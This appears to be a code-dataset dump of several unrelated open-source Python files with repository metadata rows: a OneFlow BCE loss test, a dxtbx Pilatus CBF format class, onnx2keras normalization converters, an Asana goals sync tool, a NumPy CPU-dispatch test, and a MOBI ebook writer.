return {"np_bce_grad_mean": np_bce_grad_mean}
np_out_bceloss_dict = np_bceloss(input, target, weight)
np_grad_dict = np_bce_loss_diff(input, target, weight)
def assert_prediction_grad(blob: tp.Numpy):
assert np.allclose(blob, np_grad_dict["np_bce_grad_mean"])
@flow.global_function(type="train", function_config=func_config)
def oneflow_bceloss(
of_input: tp.Numpy.Placeholder(shape=input.shape),
of_target: tp.Numpy.Placeholder(shape=target.shape),
of_weight: tp.Numpy.Placeholder(shape=weight.shape),
) -> Dict[str, tp.Numpy]:
with flow.scope.placement(device_type, "0:0"):
v = flow.get_variable(
shape=input.shape,
dtype=flow.float32,
initializer=flow.zeros_initializer(),
name="v",
)
x_var = of_input + v
flow.watch_diff(x_var, assert_prediction_grad)
bceloss = flow.nn.BCELoss(
x_var, of_target, of_weight, reduction="none", name="of_mseloss"
)
bceloss_mean = flow.nn.BCELoss(
x_var, of_target, of_weight, reduction="mean", name="of_mseloss_reduce_mean"
)
bceloss_sum = flow.nn.BCELoss(
x_var, of_target, of_weight, reduction="sum", name="of_mseloss_reduce_sum"
)
with flow.scope.placement(device_type, "0:0"):
flow.optimizer.SGD(
flow.optimizer.PiecewiseConstantScheduler([], [0.001]), momentum=0
).minimize(bceloss_mean)
return {
"of_bce_loss": bceloss,
"of_bce_loss_mean": bceloss_mean,
"of_bce_loss_sum": bceloss_sum,
}
of_out_bceloss_dict = oneflow_bceloss(input, target, weight)
assert np.allclose(
of_out_bceloss_dict["of_bce_loss"], np_out_bceloss_dict["np_bce_loss"]
)
assert np.allclose(
of_out_bceloss_dict["of_bce_loss_mean"],
np_out_bceloss_dict["np_bce_loss_mean"],
)
assert np.allclose(
of_out_bceloss_dict["of_bce_loss_sum"], np_out_bceloss_dict["np_bce_loss_sum"],
)
def _gen_arg_dict(shape, device_type, machine_ids, device_counts):
arg_dict = OrderedDict()
arg_dict["input_shape"] = [shape]
arg_dict["target_shape"] = [shape]
arg_dict["weight_shape"] = [shape]
arg_dict["device_type"] = [device_type]
arg_dict["machine_ids"] = [machine_ids]
arg_dict["device_counts"] = [device_counts]
return arg_dict
@flow.unittest.skip_unless_1n1d()
class Testbceloss1n1d(flow.unittest.TestCase):
def test_bceloss_cpu(test_case):
arg_dict = _gen_arg_dict(
shape=(3, 3), device_type="cpu", machine_ids="0:0", device_counts=1
)
for arg in GenArgList(arg_dict):
_compare_bceloss_with_np(*arg)
@unittest.skipIf(os.getenv("ONEFLOW_TEST_CPU_ONLY"), "only test cpu cases")
def test_bceloss_gpu(test_case):
arg_dict = _gen_arg_dict(
shape=(3, 16, 32), device_type="gpu", machine_ids="0:0", device_counts=1
)
for arg in GenArgList(arg_dict):
_compare_bceloss_with_np(*arg)
@flow.unittest.skip_unless_1n2d()
class Testbceloss1n2d(flow.unittest.TestCase):
@unittest.skipIf(os.getenv("ONEFLOW_TEST_CPU_ONLY"), "only test cpu cases")
def test_bceloss_gpu_1n2d(test_case):
arg_dict = _gen_arg_dict(
shape=(3, 16, 16), device_type="gpu", machine_ids="0:0-1", device_counts=2
)
for arg in GenArgList(arg_dict):
_compare_bceloss_with_np(*arg)
if __name__ == "__main__":
unittest.main()
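# --- Hedged, illustrative sketch; not part of the original OneFlow test ---
# The analytic gradient used in `np_bce_loss_diff` above,
#   d/dx mean(-w * (t*log(x) + (1-t)*log(1-x))) = -(w/N) * (t - x) / (x * (1 - x)),
# can be sanity-checked against a central finite difference. This helper is
# never invoked by the test itself; it is only a self-contained reference.
def _finite_difference_bce_grad_check(eps=1e-6):
    rng = np.random.RandomState(0)
    x = rng.uniform(0.05, 0.95, size=(4, 4))
    t = rng.uniform(size=(4, 4))
    w = rng.uniform(size=(4, 4))
    n = x.size
    analytic = -(w / n) * (t - x) / (x * (1 - x))
    def mean_bce(xv):
        return np.mean(-w * (t * np.log(xv) + (1 - t) * np.log(1 - xv)))
    # perturb a single element and compare the numeric slope with the analytic one
    x_plus, x_minus = x.copy(), x.copy()
    x_plus[0, 0] += eps
    x_minus[0, 0] -= eps
    numeric = (mean_bce(x_plus) - mean_bce(x_minus)) / (2 * eps)
    assert np.isclose(analytic[0, 0], numeric, rtol=1e-3, atol=1e-8)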
| 36.118012
| 88
| 0.672227
|
26d122a6a49b1c4dce691898b25ed907e2bb0259
| 900
|
py
|
Python
|
src/dxtbx/format/FormatCBFMiniPilatusSPring8_6MSN125.py
|
toastisme/dxtbx
|
fc24e215a8052e7e17be4ad4b41f9dbb474d852a
|
[
"BSD-3-Clause"
] | 3
|
2019-08-16T05:46:29.000Z
|
2020-09-18T08:38:37.000Z
|
src/dxtbx/format/FormatCBFMiniPilatusSPring8_6MSN125.py
|
toastisme/dxtbx
|
fc24e215a8052e7e17be4ad4b41f9dbb474d852a
|
[
"BSD-3-Clause"
] | 448
|
2019-04-06T01:20:56.000Z
|
2022-03-31T15:58:48.000Z
|
src/dxtbx/format/FormatCBFMiniPilatusSPring8_6MSN125.py
|
toastisme/dxtbx
|
fc24e215a8052e7e17be4ad4b41f9dbb474d852a
|
[
"BSD-3-Clause"
] | 10
|
2019-04-08T13:30:32.000Z
|
2021-09-30T14:48:50.000Z
|
from dxtbx.format.FormatCBFMiniPilatus import FormatCBFMiniPilatus
class FormatCBFMiniPilatusSPring8_6MSN125(FormatCBFMiniPilatus):
"""A class for reading mini CBF format Pilatus images for 6M SN 125, normally
at Spring8 BL41XU"""
@staticmethod
def understand(image_file):
"""Check to see if this looks like an Pilatus mini CBF format image,
i.e. we can make sense of it."""
header = FormatCBFMiniPilatus.get_cbf_header(image_file)
for record in header.split("\n"):
if (
"# Detector" in record
and "PILATUS" in record
and "S/N 60-0125" in header
):
return True
return False
def _goniometer(self):
"""Return a model for a simple single-axis reversed direction goniometer."""
return self._goniometer_factory.single_axis_reverse()
| 31.034483
| 84
| 0.641111
|
ed1dec2d46ebc4640a424e6cab39c5da0b92720a
| 3,502
|
py
|
Python
|
onnx2keras/normalization_layers.py
|
ag169/onnx2keras
|
0c817fb7bd776f38bab0fcca00b1af26753bf02f
|
[
"MIT"
] | 2
|
2021-04-24T00:57:53.000Z
|
2021-11-17T11:27:15.000Z
|
onnx2keras/normalization_layers.py
|
ag169/onnx2keras
|
0c817fb7bd776f38bab0fcca00b1af26753bf02f
|
[
"MIT"
] | null | null | null |
onnx2keras/normalization_layers.py
|
ag169/onnx2keras
|
0c817fb7bd776f38bab0fcca00b1af26753bf02f
|
[
"MIT"
] | null | null | null |
import keras.layers
import logging
from .utils import ensure_tf_type, ensure_numpy_type
def convert_batchnorm(node, params, layers, node_name):
"""
Convert BatchNorm2d layer
:param node: current operation node
:param params: operation attributes
:param layers: available keras layers
:param node_name: resulting layer name
:return: None
"""
logger = logging.getLogger('onnx2keras:batchnorm2d')
input_0 = ensure_tf_type(layers[node.input[0]])
if len(node.input) == 5:
weights = [
ensure_numpy_type(layers[node.input[1]]),
ensure_numpy_type(layers[node.input[2]]),
ensure_numpy_type(layers[node.input[3]]),
ensure_numpy_type(layers[node.input[4]])
]
elif len(node.input) == 3:
weights = [
ensure_numpy_type(layers[node.input[1]]),
ensure_numpy_type(layers[node.input[2]])
]
else:
raise AttributeError('Unknown arguments for batch norm')
eps = params['epsilon'] if 'epsilon' in params else 1e-05 # default epsilon
momentum = params['momentum'] if 'momentum' in params else 0.9 # default momentum
if len(weights) == 2:
logger.debug('Batch normalization without running averages')
bn = keras.layers.BatchNormalization(
axis=1, momentum=momentum, epsilon=eps,
center=False, scale=False,
weights=weights,
name=node_name
)
else:
bn = keras.layers.BatchNormalization(
axis=1, momentum=momentum, epsilon=eps,
weights=weights,
name=node_name
)
layers[node_name] = bn(input_0)
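# --- Hedged note, not part of the original converter ---
# The 4-element `weights` list above follows the ONNX BatchNormalization input
# order (scale, bias, mean, variance), which lines up with the weight order a
# Keras BatchNormalization layer with center/scale enabled expects:
# [gamma, beta, moving_mean, moving_variance]. Numerically the layer computes
#   y = gamma * (x - moving_mean) / sqrt(moving_variance + eps) + beta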
def convert_instancenorm(node, params, layers, node_name):
"""
Convert InstanceNorm2d layer
:param node: current operation node
:param params: operation attributes
:param layers: available keras layers
:param node_name: resulting layer name
:return: None
"""
logger = logging.getLogger('onnx2keras:instancenorm2d')
input_0 = ensure_tf_type(layers[node.input[0]])
if len(node.input) == 3:
gamma = ensure_numpy_type(layers[node.input[1]])
beta = ensure_numpy_type(layers[node.input[2]])
else:
        raise AttributeError('Unknown arguments for instance norm')
def target_layer(x, epsilon=params['epsilon'], gamma=gamma, beta=beta):
import tensorflow as tf
from keras import backend as K
data_format = 'NCHW' if K.image_data_format() == 'channels_first' else 'NHWC'
layer = tf.contrib.layers.instance_norm(
x,
param_initializers={'beta': tf.constant_initializer(beta), 'gamma': tf.constant_initializer(gamma)},
epsilon=epsilon, data_format=data_format,
trainable=False
)
return layer
lambda_layer = keras.layers.Lambda(target_layer, name=node_name)
layers[node_name] = lambda_layer(input_0)
def convert_dropout(node, params, layers, node_name):
"""
Convert Dropout layer
:param node: current operation node
:param params: operation attributes
:param layers: available keras layers
:param node_name: resulting layer name
:return: None
"""
logger = logging.getLogger('onnx2keras:dropout')
input_0 = ensure_tf_type(layers[node.input[0]])
ratio = params['ratio'] if 'ratio' in params else 0.0
lambda_layer = keras.layers.Dropout(ratio, name=node_name)
layers[node_name] = lambda_layer(input_0)
| 32.728972
| 112
| 0.655625
|
a43ce84b8f270025748ed891e957a0cbf5e41c0a
| 6,888
|
py
|
Python
|
python/goals-api-sfdc/src/asana_goals/__main__.py
|
Asana/DevRel-Examples
|
6ac7bcedd3843cfa7ac00bb7df28b886b61e3a6c
|
[
"MIT"
] | 2
|
2018-07-06T20:34:29.000Z
|
2018-07-13T04:05:18.000Z
|
python/goals-api-sfdc/src/asana_goals/__main__.py
|
Asana/DevRel-Examples
|
6ac7bcedd3843cfa7ac00bb7df28b886b61e3a6c
|
[
"MIT"
] | 2
|
2018-07-30T23:32:42.000Z
|
2018-08-01T05:59:29.000Z
|
python/goals-api-sfdc/src/asana_goals/__main__.py
|
Asana/DevRel-Examples
|
6ac7bcedd3843cfa7ac00bb7df28b886b61e3a6c
|
[
"MIT"
] | 1
|
2018-07-03T03:30:25.000Z
|
2018-07-03T03:30:25.000Z
|
import logging
import logging.config
from time import time, sleep
from argparse import ArgumentParser
from decimal import Decimal
from typing import Optional, Union, Dict
import toml
from croniter import croniter
from asana_goals.asana import Asana
from asana_goals.asana.goal import Goal
from asana_goals.data_source.salesforce import Salesforce
from asana_goals.initializer import InitializerProcess
AnyNumber = Union[str, int, float, Decimal]
class MainProcess:
"""
Encloses the runtime variables for an instance of this application.
"""
# List of goals we just synced
synced: Dict[str, Goal]
# Indicates if we are running standalone or as a service
service: bool
# These only get used when running as a service
cron: Optional[croniter]
shutdown: Optional[bool]
# These values are loaded from the config file
app: dict
sf: Salesforce
asana: Asana
goals: dict
def __init__(self, config_filename: str, service: bool = False) -> None:
"""
Initialize process instance.
:param config_filename: Application config to read.
:param service: If True, this package will poll based on a given cron
string.
"""
self.synced = {}
self.service = service
self.cron = None
self.shutdown = None
with open(config_filename) as f:
cfg = toml.loads(f.read())
if cfg.get("logging") is not None:
logging.config.dictConfig(cfg["logging"])
else:
logging.basicConfig()
logging.getLogger(__name__).info("Config file loaded")
self.app = cfg["app"]
self.sf = Salesforce(**cfg["salesforce"])
self.asana = Asana(**cfg["asana"])
self.goals = cfg["goals"]
def loop(self) -> None:
"""
Main loop iteration
"""
# Reset synced dict
self.synced = {}
# Sync each goal
for goal in self.app["goals"]:
self.sync_goal(goal)
def sync_goal(self, goal: str) -> Goal:
"""
        Synchronize a goal between systems. This fetches the goal's updated value
from a data source and uploads the new value to Asana.
:param goal: Goal config key.
:return:
"""
# Handle a double sync
if goal in self.synced:
return self.synced[goal]
# Handle the case where the goal is not configured
try:
goal_obj = self.goals[goal]
except KeyError:
goal_obj = None
logging.getLogger(__name__).error(
"Configuration error: Referenced goal '%s' does not exist.",
goal,
)
exit(-1)
# Update the goal value
value = self.get_value(goal_obj)
if goal_obj["source"] != "asana":
upd = self.asana.set_metric_current_value(goal_obj["goal_id"], value)
logging.getLogger(__name__).info(
"Updating goal '%s' value to '%s'",
goal, value,
)
else:
upd = self.asana.get_metric_current_value(goal_obj["goal_id"])
upd = self.asana.update_goal_status(goal_obj["goal_id"], upd.assess_status())
# Remember we just synced this Goal
self.synced[goal] = upd
return upd
def get_value(self, goal_obj: dict) -> AnyNumber:
"""
        Gets the new value for the given goal dict using a handler function
depending on said goal's source.
:param goal_obj: Configured goal
:return:
"""
source = goal_obj["source"]
# Get a handler function depending on where this goal is coming from
f = getattr(self, "get_value_" + source)
if f is None:
raise KeyError(f"Source {source} not managed.")
# Use the handle function to get the updated value
return f(goal_obj)
def get_value_composite(self, goal_obj: dict) -> AnyNumber:
"""
Gets a new value calculated from multiple subgoals.
"""
subsum = 0
for subgoal, weight in zip(goal_obj["subgoals"], goal_obj["weights"]):
sg = self.sync_goal(subgoal)
subsum += (sg.current_value / sg.target_value) * weight
return subsum
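    # Hedged worked example (hypothetical numbers, not from the source): two
    # subgoals with weights [0.6, 0.4], currently at 50/100 and 75/100, give a
    # composite value of 0.6 * 0.5 + 0.4 * 0.75 = 0.60.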
def get_value_fixed(self, goal_obj: dict) -> AnyNumber:
"""
Gets a fixed value from config.
"""
return goal_obj["value"]
def get_value_salesforce_report(self, goal_obj: dict) -> AnyNumber:
"""
Gets a new value from a Salesforce report aggregate.
"""
rpt = self.sf.get_report(goal_obj["sf_report_id"])
return rpt.get_metric(goal_obj["sf_metric"])
def get_value_asana(self, goal_obj: dict) -> AnyNumber:
"""
Gets latest value from Asana goals.
"""
rpt = self.asana.get_metric_current_value(goal_obj["goal_id"])
return 1.1
def main(self) -> int:
"""
Main function. Return exit status code.
"""
if self.service:
self.shutdown = False
self.cron = croniter(self.app["cron_string"])
next_run = self.cron.get_next()
while not self.shutdown:
if time() > next_run:
self.loop()
next_run = self.cron.get_next()
sleep(5)
else:
self.loop()
return 0
def setup_argument_parser(parser: ArgumentParser):
parser.add_argument(
"config_file",
nargs="?",
help="set a different config file instead of config.toml in current working directory",
default="./config.toml"
)
parser.add_argument(
"-s", "--service",
help="runs this program as a background service",
action="store_true"
)
parser.add_argument(
"-i", "--initialize",
help="using the provided access token, helps to generate goal entries "
"in Asana and a config file referencing them",
metavar="ACCESS_TOKEN"
)
parser.add_argument(
"-w", "--workspace",
help="workspace for the initializer",
metavar="WORKSPACE_GID",
)
parser.add_argument(
"-t", "--time_period",
help="time period for the initializer",
metavar="TIME_PERIOD_GID",
)
def main():
parser = ArgumentParser()
setup_argument_parser(parser)
args = parser.parse_args()
if args.initialize:
process = InitializerProcess(
args.config_file, args.initialize, args.workspace, args.time_period
)
else:
process = MainProcess(args.config_file, args.service)
status = process.main()
logging.getLogger(__name__).info("Process finished, shutting down.")
exit(status)
if __name__ == "__main__":
main()
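# --- Hedged sketch of the config.toml shape implied by MainProcess above ---
# (the table names and goal keys come from the code; everything inside
# [salesforce] and [asana] is whatever their constructors accept, so it is
# left as a placeholder here):
#
#   [app]
#   cron_string = "*/15 * * * *"
#   goals = ["pipeline_composite"]
#
#   [salesforce]   # passed as **kwargs to Salesforce(...)
#   [asana]        # passed as **kwargs to Asana(...)
#
#   [goals.pipeline_composite]
#   source = "composite"
#   goal_id = "<asana goal gid>"
#   subgoals = ["new_arr"]
#   weights = [1.0]
#
#   [goals.new_arr]
#   source = "salesforce_report"
#   goal_id = "<asana goal gid>"
#   sf_report_id = "<report id>"
#   sf_metric = "<aggregate name>"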
| 31.027027
| 95
| 0.594367
|
8712dee1aa80a32d2ac6e789d04576d4e0af2ec7
| 1,519
|
py
|
Python
|
venv/Lib/site-packages/numpy/core/tests/test_cpu_dispatcher.py
|
EkremBayar/bayar
|
aad1a32044da671d0b4f11908416044753360b39
|
[
"MIT"
] | 603
|
2020-12-23T13:49:32.000Z
|
2022-03-31T23:38:03.000Z
|
venv/Lib/site-packages/numpy/core/tests/test_cpu_dispatcher.py
|
EkremBayar/bayar
|
aad1a32044da671d0b4f11908416044753360b39
|
[
"MIT"
] | 387
|
2020-12-15T14:54:04.000Z
|
2022-03-31T07:00:21.000Z
|
venv/Lib/site-packages/numpy/core/tests/test_cpu_dispatcher.py
|
EkremBayar/bayar
|
aad1a32044da671d0b4f11908416044753360b39
|
[
"MIT"
] | 35
|
2021-03-26T03:12:04.000Z
|
2022-03-23T10:15:10.000Z
|
from numpy.core._multiarray_umath import __cpu_features__, __cpu_baseline__, __cpu_dispatch__
from numpy.core import _umath_tests
from numpy.testing import assert_equal
def test_dispatcher():
"""
    Testing the utilities of the CPU dispatcher
"""
targets = (
"SSE2", "SSE41", "AVX2",
"VSX", "VSX2", "VSX3",
"NEON", "ASIMD", "ASIMDHP"
)
highest_sfx = "" # no suffix for the baseline
all_sfx = []
for feature in reversed(targets):
        # skip baseline features; by default `CCompilerOpt` does not generate separate objects
        # for the baseline, just one object combining all of them via the 'baseline' option
        # within the configuration statements.
if feature in __cpu_baseline__:
continue
# check compiler and running machine support
if feature not in __cpu_dispatch__ or not __cpu_features__[feature]:
continue
if not highest_sfx:
highest_sfx = "_" + feature
all_sfx.append("func" + "_" + feature)
test = _umath_tests.test_dispatch()
assert_equal(test["func"], "func" + highest_sfx)
assert_equal(test["var"], "var" + highest_sfx)
if highest_sfx:
assert_equal(test["func_xb"], "func" + highest_sfx)
assert_equal(test["var_xb"], "var" + highest_sfx)
else:
assert_equal(test["func_xb"], "nobase")
assert_equal(test["var_xb"], "nobase")
all_sfx.append("func") # add the baseline
assert_equal(test["all"], all_sfx)
| 35.325581
| 97
| 0.646478
|
c267783d2d44e7b9998cb4e8cd27fbdc9de9d6e5
| 13,158
|
py
|
Python
|
fanficfare/mobi.py
|
AlexRiina/FanFicFare
|
2cd6f53f766e74052c6ca7ab5c2eabff24f59742
|
[
"Apache-2.0"
] | 3
|
2020-11-10T16:43:43.000Z
|
2021-04-09T07:12:31.000Z
|
fanficfare/mobi.py
|
AlexRiina/FanFicFare
|
2cd6f53f766e74052c6ca7ab5c2eabff24f59742
|
[
"Apache-2.0"
] | 5
|
2021-11-18T00:20:38.000Z
|
2021-11-18T00:21:40.000Z
|
fanficfare/mobi.py
|
AlexRiina/FanFicFare
|
2cd6f53f766e74052c6ca7ab5c2eabff24f59742
|
[
"Apache-2.0"
] | 1
|
2021-04-08T12:25:09.000Z
|
2021-04-08T12:25:09.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright(c) 2009 Andrew Chatham and Vijay Pandurangan
# Changes Copyright 2018 FanFicFare team
from __future__ import absolute_import
import struct
import time
import random
import logging
# py2 vs py3 transition
from .six import ensure_binary
from io import BytesIO
logger = logging.getLogger(__name__)
from .mobihtml import HtmlProcessor
# http://wiki.mobileread.com/wiki/MOBI
# http://membres.lycos.fr/microfirst/palm/pdb.html
encoding = {
'UTF-8' : 65001,
'latin-1' : 1252,
}
languages = {"en-us" : 0x0409,
"sv" : 0x041d,
"fi" : 0x000b,
"en" : 0x0009,
"en-gb" : 0x0809}
class _SubEntry:
def __init__(self, pos, html_data):
self.pos = pos
self.html = HtmlProcessor(html_data)
self.title = self.html.title
self._name = 'mobi_article_%d' % pos
if not self.title:
self.title = 'Article %d' % self.pos
def TocLink(self):
return '<a href="#%s_MOBI_START">%.80s</a>' % (self._name, self.title)
def Anchor(self):
return '<a name="%s_MOBI_START">' % self._name
def Body(self):
return self.html.RenameAnchors(self._name + '_')
class Converter:
def __init__(self, refresh_url='', title='Unknown', author='Unknown', publisher='Unknown'):
self._header = Header()
self._header.SetTitle(title)
self._header.SetAuthor(author)
self._header.SetPublisher(publisher)
self._refresh_url = refresh_url
def ConvertString(self, s):
out = BytesIO()
self._ConvertStringToFile(s, out)
return out.getvalue()
def ConvertStrings(self, html_strs):
out = BytesIO()
self._ConvertStringsToFile(html_strs, out)
return out.getvalue()
def ConvertFile(self, html_file, out_file):
self._ConvertStringToFile(open(html_file,'rb').read(),
open(out_file, 'wb'))
def ConvertFiles(self, html_files, out_file):
html_strs = [open(f,'rb').read() for f in html_files]
self._ConvertStringsToFile(html_strs, open(out_file, 'wb'))
def MakeOneHTML(self, html_strs):
"""This takes a list of HTML strings and returns a big HTML file with
all contents consolidated. It constructs a table of contents and adds
anchors within the text
"""
title_html = []
toc_html = []
body_html = []
## This gets broken by html5lib/bs4fixed being helpful, but we'll
## fix it inside mobihtml.py
PAGE_BREAK = '<mbp:pagebreak/>'
# pull out the title page, assumed first html_strs.
htmltitle = html_strs[0]
entrytitle = _SubEntry(1, htmltitle)
title_html.append(entrytitle.Body())
title_html.append(PAGE_BREAK)
toc_html.append(PAGE_BREAK)
toc_html.append('<a name="TOCTOP"><h3>Table of Contents</h3><br />')
for pos, html in enumerate(html_strs[1:]):
entry = _SubEntry(pos+1, html)
toc_html.append('%s<br />' % entry.TocLink())
# give some space between bodies of work.
body_html.append(PAGE_BREAK)
body_html.append(entry.Anchor())
body_html.append(entry.Body())
# TODO: this title can get way too long with RSS feeds. Not sure how to fix
# cheat slightly and use the <a href> code to set filepos in references.
header = '''<html>
<head>
<title>Bibliorize %s GMT</title>
<guide>
<reference href="#TOCTOP" type="toc" title="Table of Contents"/>
</guide>
</head>
<body>
''' % time.ctime(time.time())
footer = '</body></html>'
# logger.debug("header:%s"%header)
# logger.debug("title_html:%s"%title_html)
# logger.debug("toc_html:%s"%toc_html)
# logger.debug("body_html:%s"%body_html)
# logger.debug("footer:%s"%footer)
all_html = header + '\n'.join(title_html + toc_html + body_html) + footer
#print "%s" % all_html.encode('utf8')
return all_html
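    # Hedged illustration, not from the source: for a html_strs list with a
    # title page plus three articles, the generated TOC contains links such as
    #   <a href="#mobi_article_1_MOBI_START">First article title</a>
    # and each body section is preceded by a <mbp:pagebreak/> plus the matching
    #   <a name="mobi_article_1_MOBI_START"> anchor emitted by _SubEntry.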
def _ConvertStringsToFile(self, html_strs, out_file):
try:
tmp = self.MakeOneHTML(html_strs)
self._ConvertStringToFile(tmp, out_file)
except Exception as e:
raise
logger.error('Error %s', e)
# logger.debug('Details: %s' % html_strs)
def _ConvertStringToFile(self, html_data, out):
html = HtmlProcessor(html_data)
data = ensure_binary(html.CleanHtml())
# collect offsets of '<mbp:pagebreak>' tags, use to make index list.
# indexlist = [] # list of (offset,length) tuples.
# not in current use.
# j=0
# lastj=0
# while True:
# j=data.find('<mbp:pagebreak>',lastj+10) # plus a bit so we find the next.
# if j < 0:
# break
# indexlist.append((lastj,j-lastj))
# print "index offset: %d length: %d" % (lastj,j-lastj)
# lastj=j
records = []
# title = html.title
# if title:
# self._header.SetTitle(title)
record_id = 1
# logger.debug("len(data):%s"%len(data))
for start_pos in range(0, len(data), Record.MAX_SIZE):
end = min(len(data), start_pos + Record.MAX_SIZE)
record_data = data[start_pos:end]
records.append(self._header.AddRecord(record_data, record_id))
# logger.debug("HTML Record %03d: (size:%d) [[%s ... %s]]" % ( record_id, len(record_data), record_data[:20], record_data[-20:] ))
record_id += 1
self._header.SetImageRecordIndex(record_id)
records[0:0] = [self._header.MobiHeader()]
header, rec_offset = self._header.PDBHeader(len(records))
out.write(ensure_binary(header))
for record in records:
record.WriteHeader(out, rec_offset)
# logger.debug("rec_offset: %d len(record.data): %d" % (rec_offset,len(record.data)))
rec_offset += (len(record.data)+1) # plus one for trailing null
        # Write two nul bytes for some reason
out.write(b'\0\0')
for record in records:
record.WriteData(out)
out.write(b'\0')
# needs a trailing null, I believe it indicates zero length 'overlap'.
# otherwise, the readers eat the last char of each html record.
# Calibre writes another 6-7 bytes of stuff after that, but we seem
# to be getting along without it.
class Record:
MAX_SIZE = 4096
INDEX_LEN = 8
_unique_id_seed = 28 # should be arbitrary, but taken from MobiHeader
# TODO(chatham): Record compression doesn't look that hard.
def __init__(self, data, record_id):
assert len(data) <= self.MAX_SIZE
self.data = data
if record_id != 0:
self._id = record_id
else:
Record._unique_id_seed += 1
self._id = 0
def __repr__(self):
return 'Record: id=%d len=%d' % (self._id, len(self.data))
def _SetUniqueId(self):
Record._unique_id_seed += 1
# TODO(chatham): Wraparound crap
self._id = Record._unique_id_seed
def WriteData(self, out):
out.write(ensure_binary(self.data))
def WriteHeader(self, out, rec_offset):
attributes = 64 # dirty?
header = struct.pack('>IbbH',
rec_offset,
attributes,
0, self._id)
assert len(header) == Record.INDEX_LEN
out.write(ensure_binary(header))
EXTH_HEADER_FIELDS = {
'author' : 100,
'publisher' : 101,
}
class Header:
EPOCH_1904 = 2082844800
def __init__(self):
self._length = 0
self._record_count = 0
self._title = '2008_2_34'
self._author = 'Unknown author'
self._publisher = 'Unknown publisher'
self._first_image_index = 0
def SetAuthor(self, author):
self._author = author.encode('ascii','ignore')
def SetTitle(self, title):
# TODO(chatham): Reevaluate whether this needs to be ASCII.
# maybe just do sys.setdefaultencoding('utf-8')? Problems
# appending self._title with other things.
self._title = title.encode('ascii','ignore')
def SetPublisher(self, publisher):
self._publisher = publisher.encode('ascii','ignore')
def AddRecord(self, data, record_id):
self.max_record_size = max(Record.MAX_SIZE, len(data))
self._record_count += 1
# logger.debug("len(data):%s"%len(data))
self._length += len(data)
return Record(data, record_id)
def _ReplaceWord(self, data, pos, word):
return data[:pos] + struct.pack('>I', word) + data[pos+4:]
def PalmDocHeader(self):
compression = 1 # no compression
unused = 0
        encryption_type = 0  # no encryption
records = self._record_count + 1 # the header record itself
palmdoc_header = struct.pack('>HHIHHHH',
compression,
unused,
self._length,
records,
Record.MAX_SIZE,
encryption_type,
unused)
assert len(palmdoc_header) == 16
return palmdoc_header
def PDBHeader(self, num_records):
# logger.debug("num_records:%s"%num_records)
HEADER_LEN = 32+2+2+9*4
RECORD_INDEX_HEADER_LEN = 6
RESOURCE_INDEX_LEN = 10
index_len = RECORD_INDEX_HEADER_LEN + num_records * Record.INDEX_LEN
rec_offset = HEADER_LEN + index_len + 2
# logger.debug("index_len:%s"%index_len)
# logger.debug("rec_offset:%s"%rec_offset)
short_title = self._title[0:31]
attributes = 0
version = 0
ctime = self.EPOCH_1904 + int(time.time())
mtime = self.EPOCH_1904 + int(time.time())
backup_time = self.EPOCH_1904 + int(time.time())
modnum = 0
appinfo_offset = 0
sort_offset = 0
type = b'BOOK'
creator = b'MOBI'
id_seed = 36
header = struct.pack('>32sHHII',
ensure_binary(short_title), attributes, version,
ctime, mtime)
header += struct.pack('>IIII', backup_time, modnum,
appinfo_offset, sort_offset)
header += struct.pack('>4s4sI',
type, creator, id_seed)
next_record = 0 # not used?
header += struct.pack('>IH', next_record, num_records)
return header, rec_offset
def _GetExthHeader(self):
# They set author, publisher, coveroffset, thumboffset
data = {'author' : self._author,
'publisher' : self._publisher,
}
# Turn string type names into EXTH typeids.
r = []
for key, value in data.items():
typeid = EXTH_HEADER_FIELDS[key]
length_encoding_len = 8
r.append(struct.pack('>LL', typeid, len(value) + length_encoding_len,) + value)
content = b''.join(r)
# logger.debug("len(content):%s"%len(content))
# Pad to word boundary
while len(content) % 4:
content += b'\0'
# logger.debug("len(content):%s"%len(content))
TODO_mysterious = 12
exth = b'EXTH' + struct.pack('>LL', len(content) + TODO_mysterious, len(data)) + content
return exth
def SetImageRecordIndex(self, idx):
self._first_image_index = idx
def MobiHeader(self):
        exth_header = self._GetExthHeader()
palmdoc_header = self.PalmDocHeader()
fs = 0xffffffff
# Record 0
header_len = 0xE4 # TODO
mobi_type = 2 # BOOK
text_encoding = encoding['UTF-8']
        unique_id = random.randint(1, (1 << 32) - 1)  # keep within the unsigned 32-bit range packed as 'I'
creator_version = 4
        reserved = (b'%c' % 0xff) * 40  # 40 bytes of 0xff
nonbook_index = fs
# logger.debug("header_len:%s"%header_len)
# logger.debug("len(palmdoc_header):%s"%len(palmdoc_header))
# logger.debug("len(exth_header):%s"%len(exth_header))
full_name_offset = header_len + len(palmdoc_header) + len(exth_header) # put full name after header
language = languages['en-us']
unused = 0
mobi_header = struct.pack('>4sIIIII40sIIIIII',
b'MOBI',
header_len,
mobi_type,
text_encoding,
unique_id,
creator_version,
reserved,
nonbook_index,
full_name_offset,
len(self._title),
language,
fs, fs)
assert len(mobi_header) == 104 - 16
unknown_fields = chr(0) * 32
drm_offset = 0
drm_count = 0
drm_size = 0
drm_flags = 0
exth_flags = 0x50
header_end = chr(0) * 64
mobi_header += struct.pack('>IIIIIII',
creator_version,
self._first_image_index,
fs,
unused,
fs,
unused,
exth_flags)
mobi_header += b'\0' * 112 # TODO: Why this much padding?
# Set some magic offsets to be 0xFFFFFFF.
for pos in (0x94, 0x98, 0xb0, 0xb8, 0xc0, 0xc8, 0xd0, 0xd8, 0xdc):
mobi_header = self._ReplaceWord(mobi_header, pos, fs)
# 16 bytes?
padding = b'\0' * 48 * 4 # why?
total_header = palmdoc_header + mobi_header + exth_header + self._title + padding
return self.AddRecord(total_header, 0)
if __name__ == '__main__':
import sys
m = Converter(title='Testing Mobi', author='Mobi Author', publisher='mobi converter')
m.ConvertFiles(sys.argv[1:], 'test.mobi')
#m.ConvertFile(sys.argv[1], 'test.mobi')
| 32.25
| 136
| 0.611263
|
416e6ea9f412d86db877fc36175e8b910b0613fe
| 4,262
|
py
|
Python
|
python/paddle/fluid/tests/unittests/test_yolo_box_op.py
|
ysh329/Paddle
|
50ad9046c9a440564d104eaa354eb9df83a35678
|
[
"Apache-2.0"
] | 3
|
2019-07-17T09:30:31.000Z
|
2021-12-27T03:16:55.000Z
|
python/paddle/fluid/tests/unittests/test_yolo_box_op.py
|
ysh329/Paddle
|
50ad9046c9a440564d104eaa354eb9df83a35678
|
[
"Apache-2.0"
] | 1
|
2019-05-26T14:23:24.000Z
|
2019-05-26T14:23:51.000Z
|
python/paddle/fluid/tests/unittests/test_yolo_box_op.py
|
